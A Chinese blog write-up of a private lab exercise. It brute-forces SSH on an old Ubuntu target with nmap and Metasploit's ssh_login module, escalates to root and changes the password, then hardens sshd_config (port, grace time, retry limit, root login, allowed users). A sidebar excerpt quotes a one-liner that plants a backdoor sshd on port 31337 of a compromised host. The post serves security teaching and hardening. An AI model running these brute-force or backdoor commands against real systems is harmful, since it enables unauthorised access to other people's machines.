网络安全: Kali Linux 进行 SSH 渗透与防御

已于 2024-03-06 17:02:36 修改
阅读量1.8k 收藏 26
点赞数 28
分类专栏: 网络安全 文章标签: linux 安全 运维
于 2024-03-06 16:58:23 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/cronaldo91/article/details/136507797
版权

目录

 一、实验

1.环境

2.nmap扫描目标主机

3.Kali Linux 进行 SSH 渗透

3.Kali Linux 进行 SSH 防御 

二、问题

1.SSH有哪些安全配置

 一、实验

1.环境

(1)主机

表1  主机

系统版本IP备注
Kali Linux2022.4

192.168.204.154(动态)

Ubuntu8.04192.168.204.143Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

(3) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

(4)查看Ubuntu 8.04 系统版本及IP地址

lsb_release -a

ip addr

2.nmap扫描目标主机

(1)扫描⽬标主机所在⽹段所有存活的主机

 nmap -sP 192.168.204.0/24

(2)扫描⽬标主机所有开放端⼝对应的服务和软件版本

22端口已开放

nmap -sV 192.168.204.143

3.Kali Linux 进行 SSH 渗透

(1)进入MSF 控制台

msfconsole

(2) 搜索 ssh_login脚本

search ssh_login

(3) 使⽤编号为 0 的脚本

use 0

(4) 设置⽬标主机

 set rhosts 192.168.204.143

(4)查看选项

show options

(5)设置用户名与密码本

 set username msfadmin

set pass_file zidian.txt

(6)运⾏脚本

run

(7)查看会话

sessions

(8)连接会话

sessions 1

查看用户身份

whoami

查看路径

pwd

提升权限

 sudo -i

 再次查看用户身份

whoami

更改密码

password root

(9)MobaXterm远程连接

连接

3.Kali Linux 进行 SSH 防御 

(1)SSH安全配置(端口)

vim /etc/ssh/sshd_config

修改端口

(2)重启

/etc/init.d/ssh  restart

(3)退出之前的MSF

 (5)进入MSF 控制台

msfconsole

 (6) 搜索 ssh_login脚本

search ssh_login

(6) 使⽤编号为 0 的脚本

use 0

(7) 设置⽬标主机

 set rhosts 192.168.204.143

 (8)设置用户名与密码本

 set username msfadmin

set pass_file zidian.txt

 (9)运⾏脚本

失败

run

(10)nmap扫描端口

ssh端口为12345

nmap -sV 192.168.204.143

(11)查看选项

show options

(12) 设置目标端口

set rport 12345

 (13)运⾏脚本

run

( 14)SSH安全配置(端口)

vim /etc/ssh/sshd_config

修改登录验证时间

 (15)重启

/etc/init.d/ssh  restart

(16)验证(等待1分钟)

  (17)SSH安全配置(容错次数)

vim /etc/ssh/sshd_config

修改容错次数

 (18)重启

/etc/init.d/ssh  restart

(19)容错2次

二、问题

1.SSH有哪些安全配置

(1)配置

Port 12345            //端口                                  
LoginGraceTime 1m     //登录验证耗时                               
PermitRootLogin no    //不允许root远程登录                              
MaxAuthTries 2        //最大容错次数2                                
AllowUsers msfadmin@192.168.204.100    //允许指定用户在指定IP上登录

2.MSF 退出报错

(1)报错

[*] You have active sessions open, to exit anyway type "exit -y"

(2)原因分析

有session会话正在运行。

(3)解决方法

exit -y

cronaldo91
关注
  • 28
    点赞
  • 26
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
专栏目录
ssh--渗透
qq_49694748的博客
01-09 2332
SSH 为 Secure Shell的缩写,SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议 从客户端来看,SSH提供两种级别的安全验证 第一种级别(基于口令的安全验证) 第二种级别(基于密匙的安全验证) SSH配置文件位置:/etc/ssh/sshd_config SSH对应服务名称:sshd .ssh目录存在于用户的根目录 1、 sshsshd的区别 2、 ssh常用配置参数 3、 信息收集-nmap 4、 ss.
Kali Linux 网络安全渗透测试
06-14
为什么学网络安全? 1. 市场巨大 每年各安全厂商收入高达400亿左右,随着5G的发展,万物互联时代,市场将进一步扩大。...注意:视频教学内容仅用于网络安全渗透测试。其他行为,自己承担相应的责任,与作者无关。  
Linux上保护SSH服务器连接的8种方法
关注我!带你一路 "狂飙" 到底!
01-23 1204
服务器安全是一个非常敏感的问题,因为攻击的主要焦点是 Web 服务器,它们几乎包含有关系统的所有信息。为此,首先,禁用 root 用户的 SSH 访问并创建一个具有 root 权限的新用户。另外,您可以通过更改sshd_config文件中与密码相关的参数来完全关闭对服务器的密码访问。除了提供 SSH 安全性之外,您还可以实施许多不同的方法来保护您的 Linux 服务器。通过对该文件进行的添加,您可以限制 SSH 权限,允许特定 IP 块,或输入单个 IP 并使用拒绝命令阻止所有剩余的 IP 地址。
Linux OpenSSH最新版9.7p1升级操作详细教程
最新发布
YooYee233的博客
05-31 1337
执行步骤3时我这报了个“FirewallD is not running”的错误,表示防火墙未开启,正常开启防火墙,然后再执行步骤3即可(如果没步骤三没报错,直接执行步骤4即可)本次以测试服务器为例讲解,系统为Centos8.0 版本,升级前OpenSSH版本8.0p1,OpenSSL版本1.1.1k,案例仅供更新参考,其他系统及版本请自行测试。备注:很多服务器都是远程操作无法现场,安装telnet目的是防止SSH升级失败造成无法登录情况,telnet安全性不好,最后需关闭或卸载服务。
SSH服务渗透
wysw1998的博客
08-03 2410
1.已知攻击靶场的IP //探测靶场开放的服务与服务的版本 nmap -sV 靶场IP //探测靶场全部信息 nmap -A -v IP //探测靶场的操作系统类型与版本 nmap -O IP config是配置文件,里面可能有用户名和密码 这是第一次启动metasploit的情形,回车是默认选项 返回每一条登陆信息 开启破解,获得答案hadi123,时间还是...
SSH服务的渗透测试
小锤队长的博客
10-05 3300
目录 一,ssh私钥泄露 充电站: 二,ssh 服务测试(暴力破解) 充电站: 一,ssh私钥泄露 靶场:192.168.11.166 1,信息嗅探 对于一个给定的ip得知的靶场机器,我们需要用对其进行扫描,探测开放的服务。(渗透其实是针对服务的漏洞进行探测,然后对应的数据包发送,获取机器的最高权限) nmap -sV 192.168.11.166 //挖掘开放服务...
渗透技巧之ssh
huyangg的专栏
09-21 799
原文地址:http://www.anquan.us/static/drops/tips-1951.html 1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口 肉鸡上执行 mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337; 就会派生一个31337端口,然后连
操作系统安全kalilinux简介.ppt
06-01
运行这个命令,并将输出放到一个名为newpasswordlist.txt的文本文件中,可用如下实例输入: * 通常,用户利用Nmap来进行网络系统安全的评估,而黑客则利用扫描网络。例如,通过向远程主机发送探测数据包,获取主机的...
kali linux安全渗透教程_网络攻防_安全测试_KaliLinux安全渗透_
10-02
详细介绍如何使用kali linux进行网络攻防,渗透测试等
Kali Linux无线网络渗透kali安装教程
11-06
本教程详细讲解了如何对PIN、WEP、WPA/WPA2、WPA+RADIUS等不同加密方式的无线网络进行渗透测试,以及如何使用Wireshark这样的网络嗅探工具捕获和分析无线网络数据包。通过这些实践,你可以学习到如何识别和利用无线...
Kalissh爆破以及nikto工具漏洞扫描-漏洞银行大咖周3 -屌丝绅士
01-26
来源:漏洞银行大咖面对面一周大咖秀3 作者:屌丝绅士
kalitools:Kali Linux工具清单
02-03
kalitools:Kali Linux工具清单
SSH弱口令渗透测试
明裕学长的博客
05-23 1238
任务环境说明: 服务器场景:Linux 服务器场景操作系统:Linux(版本不详) 渗透机环境说明: BT5渗透机用户名:root密码:toor Kali渗透机用户名:root密码:toor Windows7渗透机用户名:administrator密码:123456 靶机场景 19-JY-Linux--1 172.16.102.250 1.在BT5中使用Zenmap工具扫描服务器场景Linux所在网段(例如:172.16.101.0/24)范围内存活的主机IP地址和指定开放的21、22、23端口。并将该
渗透测试学习/攻击SSH
dkpower111的博客
01-30 727
SSH SSH 为 Secure Shell 的缩写,(安全外壳协议)由 IETF 的网络小组(Network Working Group)所制定;SSH 为建立在应用层基础上的安全协议。SSH 是较可靠,专为远程登录会话和其他网络服务提供安全性的协议。利用 SSH 协议可以有效防止远程管理过程中的信息泄露问题。SSH最初是UNIX系统上的一个程序,后来又迅速扩展到其他操作平台。SSH在正确使用时可弥补网络中的漏洞。SSH客户端适用于多种平台。几乎所有UNIX平台—包括HP-UX、Linux、AIX、Sol
ssh服务渗透(拿到第一个用户权限)
weixin_43803070的博客
07-19 1580
** ssh基础知识: ** ** 一、信息收集 ** 探测开放端口服务 root@kali:~# nmap -sV 192.168.1.107 Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2019-07-05 21:04 CST Nmap scan report for 192.168.1.107 Host is up (0.00013s l...
一、渗透思路系列 -- SSH
Peter 的博客
01-22 1467
本系列文章旨在对于有一定网络安全基础的人员,在日常工作中针对一些中间件、web应用、系统漏洞… 提供渗透思路。请勿应用非法途径。 暴力破解 SSH 支持弱加密算法漏洞(SSH Weak Algorithms Supported) ...
我要偷偷的学渗透,然后惊讶所有人(ssh服务渗透)
qq_20765511的博客
03-10 4649
准备需要的靶机 这次也是ssh服务的靶机,有需要或者感兴趣的家人们可以私信我,放心没有什么广告收费什么的,都是免费的 kali IP 192.168.43.105 靶机 IP:192.168.43.59 我之前的文章有怎么教获取靶机的IP 渗透第一步,先扫描信息 这里使用 nmap -sV IP 开放的服务和服务信息 nmap -sV 192.168.43.59 这里开放了三个端口,其中有80端口,可以去看看网址上有什么信息 这里可以看到这可能是用户名,可以先记着 随后在来深入的扫描一下 dirb
2023版Kali Linux高级渗透测试指南:保障网络安全
"精通Kali Linux 高级渗透测试2023版本(Mastering Kali Linux for Advanced Penetration Testing Fourth Edition)是一本由Vijay Kumar Velu编写的权威指南,它在当前数字化时代背景下,聚焦于网络安全领域。...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值